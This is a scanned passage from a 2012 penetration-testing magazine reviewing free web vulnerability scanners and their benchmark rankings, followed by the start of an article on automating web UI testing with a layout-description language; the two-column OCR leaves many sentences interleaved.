problems. Apart from this the user can also configure
WebSecurify (Windows, Linux, Mac OS X) the tool to test for other inconsistencies using add-ons
WebSecurify is a very powerful web application and and plugins. So this implies that the application can also
website security testing environment designed from the be modified according to the business requirement and
ground up to provide the best combination of automatic security standard expected.
and manual vulnerability testing technologies.
WebSecurify allows the user to either automate the Multi platform, Multi format testing application
process of Web testing or do it all manually. WebSecurify adjusts according to the Web application
It works by automating the browser operations and the targets and optimizes itself to produce efficient test
user just has to specify the target to check for security results. Its core testing engine and cutting edge

Figure 1. The SQL Injection Detection Accuracy Benchmark Results Figure 2. The Re�ected XSS Detection Accuracy Benchmark Results

THE BEST OF 01/2012 Page 189 http://pentestmag.com


WEB APP PENTESTING
technologies employed, make it one of the finest tools may be to exclude the application, server error or the
available for Web application security. The testing lack of an exception handler.
application works on operating systems like Windows, Wapiti prints a warning every time it founds a script
MAC OS X, and Linux. Apart from this it can also operate allowing HTTP uploads. A warning is also issued when
on various modern browsers and Virtual machines, a HTTP 500 code is returned (useful for ASP/IIS)
practically making it platform independent. Wapiti can detect the following vulnerabilities:

Easy to use and Upgrade • File Handling Errors (Local and remote include/
Thanks to a simple design and functionality this require, fopen, readfile…)
application is easy to use. Every single feature of the • Database Injection (PHP/JSP/ASP SQL Injections
application can be extended or customized with the and XPath Injections)
help of customization extensions and plugins. • XSS (Cross Site Scripting) Injection
In Shay Chen’s new security scanner group test • LDAP Injection
WebSecurify ranked 10th out of 38 in the (free tool) SQL • Command Execution detection ( eval(), system(),
Injection Detection Accuracy test, and managed 12th in passtru()…)
the Reflected XSS Detection Accuracy benchmark, • CRLF Injection (HTTP Response Splitting, session
where the program performed considerably better than fixation…)
some big names (Nessus was 34th).
Shay Chen’s security scanner group test ranks Wapiti
Wapiti (Windows, Linux, Mac OS X) as the number one tool for SQL Injection Detection
Wapiti is written in Python and uses a Python library Accuracy test, but only managed 26th in the Reflected
with all the basic functionalities of a scanner and allows XSS Detection Accuracy benchmark.
you to audit the security of your Web applications.
Wapiti is a vulnerability scanner for Web applications Skip�sh (Windows, Linux, Mac OS X)
that search for the vulnerabilities like XSS, SQL and Skipfish is an active Web application security
XPath injections, file inclusions, command execution, reconnaissance tool. It prepares an interactive sitemap
LDAP injections, and CRLF injections for the targeted site by carrying out a recursive crawl
Wapiti finds unknown vulnerabilities in web and dictionary-based probes. The resulting map is then
applications. Wapiti basically performs black-box scans, annotated with the output from a number of active (but
where it only study the source code of the application hopefully non-disruptive) security checks. The final
and scan the webpage’s of the deployed webapp, report generated by the tool is meant to serve as a
looking for scripts and forms where it can inject data. foundation for professional Web application security
Once it gets this list, Wapiti acts like a fuzzer, injecting assessments.
payloads to see if a script is vulnerable. Fuzzing is Skipfish works from dictionary files with the .wl
a method for testing of applications and runs in an extention. According to Skipfish these dictionaries
automated manner. This is the transfer of random data are of critical importance to the quality of your scans.
and verifying what the outcome of this action. The result Each entry in the dictionary is either an extension (e)
or wordlist (w). The dictionaries are used for when a

Figure 3. Websecurify screenshot Figure 4. Wapiti vulnerabilities report

THE BEST OF 01/2012 Page 190 http://pentestmag.com


new directory, or a file-like query or POST parameter is that cannot be accessed, resources requiring HTTP
discovered, the scanner attempts passing all possible authentication, broken links, server errors, all external
values to discover new files, directories, etc. links not classified otherwise, all external e-mails, all
The scan’s result provides a huge directory of files external URL redirectors, links to unknown protocols,
that are fed into index.html. When called by the Web form fields that could not be auto-completed, password
browser, this report turns out to be easily readable and entry forms (for external brute-force).
comes with pointy-clicky goodness, thanks to a plethora
of JavaScript (so be sure you’re allowing it to be seen). The key features are:
The report lists each page that was interrogated during
the scan and documents server responses (including High speed
errors and successful replies), identifies possible attack Written in pure C with an optimized HTTP handling and
vectors (such as password entry fields to brute force), a minimal CPU footprint.
along with other useful tidbits for each. Following
the breakdown by page, SKIPFISH provides a list of Ease of use
document types (html, js, PDF, images, and various Supports a variety of quirky web frameworks and mixed-
text formats) and their URLs. The report closes with technology sites, with automatic learning capabilities,
an overview of various issues discovered during the on-the-fly wordlist creation, and form auto-completion.
scan, complete with severity ratings and the URL of the
finding. Cutting-edge security logic
Skipfish runs through a set of tests which detect high, Incorporates high quality, low false positive, differential
medium and low risk flaws: security checks.
Skipfish comes with low false positives, inequality
High risk flaws confidence checks that have been efficient of spotting
Includes server-side SQL injections like blind vectors, a accumulation of ethereal flaws, incorporating blind
numeric parameters, server-side shell command injection vectors.
injection, server-side XML/XPath injection, integer Shay Chen’s security scanner group test ranks
overflow vulnerabilities, and location accepting HTTP Skipfish as 18th for SQL Injection Detection Accuracy
PUT. test, and managed a 15th in the Reflected XSS
Detection Accuracy benchmark.
Medium risk flaws
Includes Stored and Reflected XSS vectors in document Vega (Windows, Linux, Mac OS X)
body Stored, Reflected XSS vectors via HTTP redirects, Vega is a GUI-based, multi-platform, free and open
Stored and Reflected XSS vectors via HTTP header source Web security scanner that can be used to find
splitting, Directory traversal, assorted file POIs, Attacker- instances of SQL Injection, Cross-Site Scripting (XSS),
supplied script and CSS inclusion vectors and more. and other vulnerabilities in your Web applications. Vega
also includes an intercepting proxy for interactive Web
Low risk issues application debugging. Vega attack modules are written
This includes directory listing bypass vectors, in Javascript, users can easily modify them or write their
redirection to attacker-supplied URLs, attacker-supplied own.
embedded content, external untrusted and embedded
content, mixed content on non-scriptable subresources
(optional), HTTP credentials in URLs.

Internal warnings
Includes failed resource fetch attempts, exceeded
crawl limits, failed 404 behavior checks. IPS filtering
detected, unexpected response variations, seemingly
misclassified crawl nodes.

Non-specific informational entries


Includes General SSL certificate information,
Significantly changing HTTP cookies, changing server,
via or X-… headers, new 404 signatures, resources Figure 5. Skip�sh screenshot

THE BEST OF 01/2012 Page 191 http://pentestmag.com


WEB APP PENTESTING
Vega runs in two modes of operation: as an automated to use integrated penetration testing tool for finding
scanner, and as an intercepting proxy. vulnerabilities in Web applications.
The automated scanner automatically crawls websites, ZAP is intended to provide everything that you need
extracting links, processing forms, and running modules to perform a penetration test on a Web application. If
on possible injection points it discovers. These modules you are new to Web application security then it might
can do things like automatically submit requests that be the only security tool you need. However, if you’re
fuzz parameters, for example, to test for things like an experienced penetration tester be sure to include it
Cross-Site Scripting (XSS) or SQL Injection. as one of the many tools in your toolbox. As a result,
The intercepting proxy allows for detailed analysis the development team is trying to make it as easy
of browser-application interaction. When enabled, the as possible to integrate ZAP with other tools. They
proxy listens on localhost as a proxy server. When a provide a way to invoke other applications from within
browser uses the Vega proxy, requests and responses ZAP passing across the current context. In version
are visible to Vega. Vega can be told to set breakpoints, 1.3 they introduced an API which allows the core ZAP
interception criteria for outgoing requests (from the functionality to be invoked by a REST API, and will be
browser) or incoming responses (from the server). extended to cover even more of ZAP’s features in future
These requests and responses are held in a state releases. This is an ideal way for other applications
where they are editable until released. to directly drive ZAP, and can be used when ZAP is
Vega supports modules that process responses, running in headless mode (i.e. without the UI).
typically looking for information (grep modules). As such, the brute force/forced browsing support is
Response processing modules can process responses provided via DirBuster and fuzzing makes use of the
received by either the scanner or the proxy. Beneath JBroFuzz libraries (both OWASP projects).
the hood is a database where information, including Amongst the more advanced features that users
requests and responses, can be shared among might not be aware of is that ZAP keeps track of all of
components. the anti-CSRF tokens it finds. If fuzzing a form with an
Both types of modules are capable of generating anti CSRF-token in it, ZAP can regenerate the token
alerts that incorporate a combination of dynamic for each of the payloads you fuzz with. There’s also
content from the module, and static content in an XML an experimental option that allows this to be turned on
file specified by the alert. when using the active scanner as well. I can say that
The Vega crawler analyzes pages, extracting URIs quality CSRF testing is not commonplace among ZAP’s
and processing forms. Vega decomposes the path Web application testing contemporaries.
structure of URIs and analyzes them to determine if In addition to the aforementioned Security Regression
they are directories or files. Each path part is stored Tests for developers, the OWASP ZAP project offers
with identified type information, as a path state node, ZAP Web Application Vulnerability Examples, or ZAP
in a tree-like data structure. URIs that accepts GET WAVE. ZAP WAVE includes active vulnerabilities
or POST parameters are further decomposed into
derivative path state nodes, one for each parameter,
and each with a parameter index.
Basic modules that have been selected to run are run
once on each path state node.
Shay Chen’s security scanner group test ranks Vega
a very good 7th place for SQL Injection Detection
Accuracy test, and is rated a good 8th in the Reflected
XSS Detection Accuracy benchmark.

OWASP Zed Attack Proxy (Windows, Linux,


Mac OS X)
OWASP ZAP is a fork of the once favored Paros Proxy,
which has not been updated since August 2006. ZAP
is the result of Simon Bennetts’ hard work, though
he’s got help from co-lead Axel Neumann and many
contributors.
As an official OWASP project, ZAP enjoys
extensive use and development support as an easy Figure 6. Vega screenshot

THE BEST OF 01/2012 Page 192 http://pentestmag.com


such as cross-site scripting and SQL Injection as well a vast amount of plugins that will help audit your Web
as passive vulnerabilities including three types of application for the usual vulnerabilities like SQL and MX
information leakage and two session vulnerabilities. Injection, Cross Siting and so on. The tool can also be
There are also pending false positives that are not yet used to discover content on you web application with
ready for primetime. several of it’s plugins.
The developers recommend that you explore the You can use your knowledge of your website to pick
target app with ZAP enabled as a proxy, and touch as which discovery methods are best. For instance if your
much of it as possible before spidering. Doing so helps site doesn’t have an IDS or WAF then using the afd
ZAP find more vulnerabilities as you may cross paths would waste time and add un-useful information to your
with error messages, etc. report.
One of my favorite ZAP features (there are many) There are a few other plugin groups available that may
is the fuzzer. The fuzzer, like the scanner, includes be useful when you are auditing your web application.
functionality, which causes ZAP to automatically The mangle plugin called sed allows for manipulation
regenerate the tokens when required. In the of http requests and responses. The evasion plugins
understanding that fuzzing is the art of submitting a allow for evasion of WAFs, IDS/IPS, and hard coded
great deal of invalid or unexpected data to a target, you checks of input. The bruteforce plugins allow for brute
can look for variations in results such as response code forcing of authentication into the web application. Lastly
(200 OK) and response times. Strings in a response can the grep plugins allow for string searches of the web
now be fuzzed to try to find vulnerabilities. Anti CRSF application.
tokens can be detected and automatically regenerated A great resource to learn more about these plugins is
when fuzzing. This functionality is based on code from located at the w3af website.
the OWASP JBroFuzz project. W3AF is a technical tool for Web application
In Shay Chen’s security scanner group test ZAP penetration testers. This is not a point and click tool, it
fared an excellent 4th place for SQL Injection Detection requires getting your hands dirty and understanding the
Accuracy test, but only managed a 13th in the Reflected different plugins to really get some value from it.
XSS Detection Accuracy benchmark. In Shay Chen’s security scanner group test W3AF
came at 13th place for SQL Injection Detection Accuracy
W3AF (Windows, Linux, Mac OS X) test, and only managed a 14th in the Reflected XSS
W3AF is a Web application attack and audit framework Detection Accuracy benchmark.
written in Python with a plugin based model. The project
has more than 130 plugins, which check for SQL Watobo (Windows, Linux, Mac OS X)
injection, cross site scripting (xss); local and remote file This tool was presented at the recently held OWASP-
inclusion and much more. Stuttgart in April 2010! The Web Application Toolbox
W3AF has many plugins that are divided into attack, has been programmed in such a way so as to enable
audit, exploit, discovery, evasion, bruteforce, mangle security professionals help perform highly efficient
and a few others. The code is well commented and (semi-automated) web application security audits.
written in python so writing your own exploits and plugins
should be trivial. It attempts to find vulnerabilities in your
Web application using known attack methods. There is

Figure 7. ZAP screenshot Figure 8. W3AF screenshot

THE BEST OF 01/2012 Page 193 http://pentestmag.com


WEB APP PENTESTING
The author Mr. Andreas Schmidt, is convinced that • Transcoder
the semi-automated approach is the best way to • URL, Base64, MD5, SHA-1
perform an accurate audit and to identify most of the • Interceptor
vulnerabilities. • Fuzzer
The working of this tool is similar to WebScarab, Paros • Free, Stable and Open source!
or Burp in a sense. It has a good GUI and also supports • Script code easy to understand
a command line input. Also, since it is semi-automated, • Easy to extend / adapt
it does not actually need to be adjusted for optimum • In real-world scenarios tested and developed
results and correctly configured. Human intervention • Speed / usability
will obviously do well over a completely automated • Active and Passive checks
process. It can perform two types of checks – active
and passive. Passive checks analyze data for normal This tool has been programmed in FxRuby which some
browsing, including but not limited to cookie security people might not be open to work with.
related operations. Active checks generate questions Watobo enables security professionals to perform
that can be used for while say – SQL injection checks or highly efficient, semi-automated Web application
other checks. Other than these, no additional requests security audits and is a good tool for discovering certain
are sent to the application! misconfigurations in addition to other audit functions for
What really bought us in for this tool is session- the likes of XSS and SQLi.
management which any free tool lacks! Burp In Shay Chen’s security scanner group test Watobo
Professional includes it, but not in thefree version. This fared a good 9th place for SQL Injection Detection
is the same with NetSparker. Also, these tools often Accuracy test, and only managed a 19th in the Reflected
have only limited automated functions. Customizing XSS Detection Accuracy benchmark.
paid tools is not easy either. Not this one. Another good
thing about this tool is that it can be quickly adapted to Arachni (Linux, Windows/Cygwin)
new requirements. In short with this tool, you can enjoy Arachni is a fully automated system which tries to
benefits of both worlds manual and automatic tools enforce the fire and forget principle. As soon as a
combined! scan is started it will not bother you for anything nor
require further user interaction. Upon completion, the
Functions of WATOBO: scan results will be saved in a file which you can later
convert to several different formats (HTML, Plain Text,
• Supports session management. XML, etc.)
• Detects logout and automatically takes a re-login. The project was initially started as an educational
• Supports filter functions exercise though it has since evolved into a powerful
• Inline-Encoder/Decoder and modular framework allowing for fast, accurate and
• Includes vulnerability scanner flexible security/vulnerability assessments. More than
• Quick-scan for targeted scanning a URL that, Arachni is highly extend-able allowing for anyone
• Full-scan to scan a whole session to improve upon it by adding custom components and
• Manual request editor with special functions tailoring most aspects to meet most needs.
• Session information is updated As soon as a scan is started it will not bother you
• Login can be done automatically for anything nor require further user interaction. Upon
completion, the scan results will be saved in a file
which you can later convert to several different formats
(HTML, Plain Text, XML, etc.).

Figure 9. WATABOO screenshot Figure 10. Arachni screenshot

THE BEST OF 01/2012 Page 194 http://pentestmag.com


References
• Commercial Web Application Scanner Benchmark, Shay Chen http://sectooladdict.blogspot.com/2011/08/commercial-web-ap-
plication-scanner.html
• Project WAVSEP, Shay Chen http://code.google.com/p/wavsep/
• WebSecurify http://www.websecurify.com/
• Wapiti http://wapiti.sourceforge.net/
• Skip�sh http://code.google.com/p/skip�sh/
• Vega http://www.subgraph.com/products.html
• OWASP ZAP https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
• W3AF http://w3af.sourceforge.net/
• Watobo http://watobo.sourceforge.net
• Arachni http://arachni.segfault.gr

Arachni uses various techniques such as taint- The major issue here is that selecting ineffective
analysis, fuzzing, differential analysis, and timing/delay security testing tools can be a costly venture. I’ve
attacks along with novel technologies like rDiff analysis burned thousands of dollars and countless hours on
and modular meta-analysis developed specifically tools that seemed like a good fit based on their tricked
for the framework to compensate for the widely out websites and fancy marketing slicks. But talk is
heterogeneous environment of web applications. cheap so buyers beware. You have to take these tools
One of the biggest advantages of Arachni is its highly for a spin to see if they’re going to be a good fit based
modular nature. The framework can be extended on YOUR style inside YOUR environment, and based
indefinitely by the addition of components like path on YOUR business needs.
extractors, modules, plug-ins, or even user interfaces. Whether you’re doing the actual work or just want to
Arachni is not only meant to serve as a security make sure your IT and security staff members are using
scanner but also as a platform for any sort of black what’s best for the organization, the simple truth is that
box testing or data scraping; full-fledged applications good security audit tools can and will make a difference.
can be converted into framework plug-ins so as Always remember that there is no one best tool but if
to take advantage of the framework’s power and you’re smart about your approach you shouldn’t have
resources. Arachni’s flexibility goes so far as to enable to spend a lot of money to get the job done right. If you
system components (like plug-ins) to create their own invest a relatively small amount time researching, asking
component types and reap the benefits of a modular prospective vendors tough questions and actually trying
design as well. the tools before you buy them, then you can’t lose.
Arachni was the only (from a long list of commercial When you choose and use good tools, you’ll know it.
and FOSS systems) that hit 100% on both XSS and Amazingly, you’ll minimize your time and effort installing
SQLi tests in the WAVSEP benchmark. them, running your tests, reporting your results
– everything from start to finish. Most importantly,
Conclusion with a good web vulnerability scanner you’ll be able
Like chemists, carpenters and doctors, those of us to maximize the number of legitimate vulnerabilities
working in IT need good tools if we’re expected to do a discovered to help reduce the risks associated with your
good job. When dealing with application security, good information systems. At the end of the day and over the
security testing tools will always set the professionals long haul, this will add up to considerable business
apart from the amateurs. In fact, the quality of your tools value you can’t afford to overlook.
for performing a site security audit will have a direct
impact on the number of vulnerabilities you discover VINODH VELUSAMY
and the overall success of your testing. Vinodh Velusamy is an ISTQB certi�ed professional currently
Many have argued – myself included – that you cannot working as Quality Assurance Specialist at Verizon’s Security
rely on tools alone to find all security vulnerabilities. Solution Group. He has experience in software testing
This is absolutely correct. In all but the most basic for more than 10 years and has been involved in software
security checks, you have to rely on experience and development for more than 15 years. He has authored
technical knowledge to root out the less-than-obvious articles on open source software tools in online tech websites
vulnerabilities that black-box scanners simply cannot such as freshmeat.net. He has also presented in software
find. That said manual testing alone is just too time testing conferences such as Software and Systems Quality
consuming, limited and, for many, downright difficult. A Conference, Dusseldorf, Germany and ICSSEA Workshop on
good balance of tools and manual analysis is needed. System Testing and Validation, Paris, France.

THE BEST OF 01/2012 Page 195 http://pentestmag.com


WEB APP PENTESTING

A Chance
To Ease Automated Web Site Testing
Do We Need Yet Another Language?

Lets face it. Testing a web application is a tedious task. Also,


the requirements for a perfect tester are almost impossible to
meet. Such person should be thorough, resistant to boredom
of numerous repetitions and yet creative to invent new testing
scenarios. It would be hard to justify saying such persons don’t
exist, yet they are extremely hard to find.

C
reative people tend to be bored easily, while The primary reasons for that, being the complexity of
seriously dependable personality often do not the output and its volatility, both being addressed later
leave much space for creativeness. on in this article. As a result, testing an application at the
But we do have another resource that can be utilized UI level, often referred to as ‘beta testing’ is still mainly
for testing: computers. Computers running testing handled by human teams.
programs are almost ultimately focused on completing This also applies to web applications’ security tests,
the requested routine as many times as needed. At which are performed usually by a dedicated group of
the same time they posses almost negligible creativity security specialists, trying to provide the application
when it comes to inventing new testing scenarios. with such data that will cause its malfunction, exposing
Considering these factors, the choice seems quite a vulnerability (an illustrative simplification of course).
obvious. We can utilize automated/computer testing for Security testing is actually an amplified issue of the
the routine part of the tests, while the testing team focuses mundaneness vs creativity problem described above.
on inventing new scenarios. This is indeed the setup the While it often requires lot of knowledge, intelligence
industry has implemented and has been carrying out and cunning to come up with a certain set of parameter
for quite some time. Taking it a step further, there is a values that could break the application, there may also
number of software development methodologies that a lot of dull work involved, especially if the application
implement so called test driven development . In these logs the user out when it recognizes an attack attempt.
methodologies, automated tests gain additional focus, In such case the tester needs to log in again and often
being prepared before the actual development of the go through a few forms until he gets to the point when
target application takes place. Supposedly, this gives the the next attempt can be performed. And then – rinse
application developers tools to instantly verify the results and repeat... often too many times.
of their work, with the ultimate goal of improved overall It would certainly help to automate at least part of the
quality of the produced software. testing, e.g. inputting login data or clicking through web
Yet as usual, the real world proves to be more pages to get to the desired location. It would also be
challenging that initially anticipated. Although automated nice to have an automated system that could recognize
tests are quite often used for testing core application whether while fuzzing [1] parameters, application
functionality (as unit or functional tests), they are rarely entered some unusual state – which may be identified as
implemented for testing the user interface (UI) level. a change of the resultant web page. Unsurprisingly, there

THE BEST OF 01/2012 Page 196 http://pentestmag.com


are quite a few tools already that have been developed to numbers of users logging every minute into the service.
help with automated web testing. Some examples could Considering these examples, it seems safe to assume
be: Selenium [2], Watir [3] or Perl Mechanize [4]. They that when commercial web sites are considered, an
basically fall into two categories. The legacy approach is average size of the HTML describing it will be counted in
based on directly parsing of the HTTP data received from tens of kilobytes. This is one of the factors that contribute
the server. This requires a lot of effort from the test team to to the difficulty of automated testing, effectively hindering
utilize, since the average size of a web application’s page all test methods that are based on analyzing the HTML
is surprisingly big (see below). The most recent approach received from the server. Its importance is not however
is based on simulating the behavior of user/browser, fully acknowledged until we consider the second difficulty
either providing set data for certain input fields or replying factor, which is the possibility of different HTML code be
a list of actions performed in the browser (Selenium). Still rendered into identical pages presented to the viewer.
we cannot really see a wide adoption of these. Why is it HTML provides a number of methods to arrange the
so? – one may ask, especially considering the benefits of layout of the page. Use of tables is currently considered
automated testing. Well, lets have a look at a single, yet obsolete but is still present in a number of web sites,
quite typical scenario, or: the primary tool however is the <div> tag and its ‘style’
attribute. The style properties available for the tag allow
Why Is The Web Page Code So Large And to achieve the desired placement of the elements in
Complex? almost unlimited number of ways. At the same time
Consider the login page of gmail.com mail service, whose it gives almost no chance to guess in advance the
screen shot is presented below in Figure 1. It consists placement of the elements in the web page. Until of
of less than two dozens of objects visible to the user course the page is actually rendered in a browser
(images, links, form fields) plus some textual information. window. These issues make it extremely difficult to
There aren’t too many people brave enough to call it utilize automated scripts for pages’ processing and
complicated, or overloaded with content. Now, lets look navigation.
at the source HTML of the page – its approx. 56kB (at Lets look at an artificial, yet reasonably close to real-
the time of writing). Over 50 thousands of characters to world scenario: assume we have a financial website
define this page – if printed in form of a book, such book with a page listing available reports. After choosing
will need to have around 30-50 pages. And this is just a the report we are allowed to enter additional report
login page to a mail service. But maybe gmail is somehow parameters (start/end date, additional report criteria).
special, lets look at the others. News site for starters: Due to the application design, the user has to go
bbc.com (100kB), onet.pl (113.kB), cnn.com (87kB) through the first web page (report selection) first, before
– there is much more information in these pages, lots of additional parameters can be changed. If the tester
images, but in HTML the images are not embedded in the wants to examine a particular report – and its additional
code – merely referenced. Lets look at just login pages parameters for vulnerabilities, he/she needs to click
(which should be relatively simple): barclays.com (22kB), through these two pages many times in order to check
facebook.com (7kB), amazon.com (56kB). Facebook’s a range of parameters and cannot just supply a fuzzed
login page is surprisingly small (compared to others), set requests as the service will reject them. Although it
but its safe to assume it’s size was fine tuned to the last seems possible at the first glance to write an automated
character to limit the bandwidth required by the enormous script that will always select the requested report (lets
assume its the second form in the page’s HTML code),
such script will only work for this certain release of the
application. With the next changes or upgrades (since
the page is most likely automatically generated), the
form may be placed somewhere else in the HTML
code, or its ID may change, or any other thing may
happen to the underlying code. As a result, most of the
automatically generated tests will fail, not being able to
match the received response against the stored pattern.
This also applies to the modern, browser-based tests,
like these performed with Selenium. They are also
vulnerable to changes in the IDs (or order – in absence
of the IDs) of the input fields, rendering them unusable
Figure 1. Gmail login web page after such changes to the web application.

THE BEST OF 01/2012 Page 197 http://pentestmag.com


WEB APP PENTESTING
At this point, to make the testing script usable, the the graph nodes and the graph edges representing
tester needs to look into the new page’s code, and relation between objects – as presented in Figure 2
adjust the script so it fits the new page. At the third (only a small set of possible objects is presented).
or fourth change the tester will most likely become In this figure the two input fields are declared to be
irritated, just give up and continue testing the pages inside of the Form box with one input field above the
manually, crossing out script-based testing from their list other. Some of the objects also have certain properties
of acceptable methods. The most surprising part is, that declared (e.g. the form box is blue).
the web page will often actually look the same, with the A graph is a neat form, with a lot of formal tools and
report selection in the same place (e.g. top right corner), methods already developed, but before they can be
just the underlying code changes because of some new utilized, we need to transform both the inspected web
features, modified advertisement banner, etc. page and a description in the proposed language into
And so we come to the root of the problem of script- that form.
based testing for web pages. The constant change of Generating a graph representation of a real web
the underlying, generated HTML code makes prepared page seem an easy task at the first glance. There is the
scripts that parse the code obsolete (or at least outdated) DOM [5] after all which describes the relation between
rather quickly, making them in turn not worth the effort they the elements. It has a form of a tree and trees are just
require to produce. To change this, we would need more a subset of graphs. Unfortunately, the DOM does not
effective methods, allowing us to describe the page and provide us with information about the placement of the
its elements in a more convenient way. In other words, we objects in the page. There might be some positional
may need a new language, that will focus more on human data included, in the form of style properties, but for the
perception of the page, different from HTML, which is a most part its up to the web renderer to place the objects
technical description needed for a computer to render it. after interpreting the whole HTML document. Therefore,
My team has been working on this issue recently, and we the best solution we have found so far is to utilize an
have come to the following conclusions: actual renderer to lay out the page elements and then
traverse the DOM and retrieve the objects’ properties,
• such language should allow for the objects in the page including their location of each object in the page. We
to be described relative (in terms of size, position, can then generate a graph similar to that presented in
etc.) to other objects. This is a direct outcome of Figure 2, except the positional relations are measured
experiments we have performed as published in [8] in pixels, not generalized terms like above.
• the language must also incorporate various level of At the same time, the description of requirements
objects’ details and their relations, allowing the user must also be represented as a graph in order to match
to either specify general relation (e.g. the leftmost them against each other and find out the differences.
input field in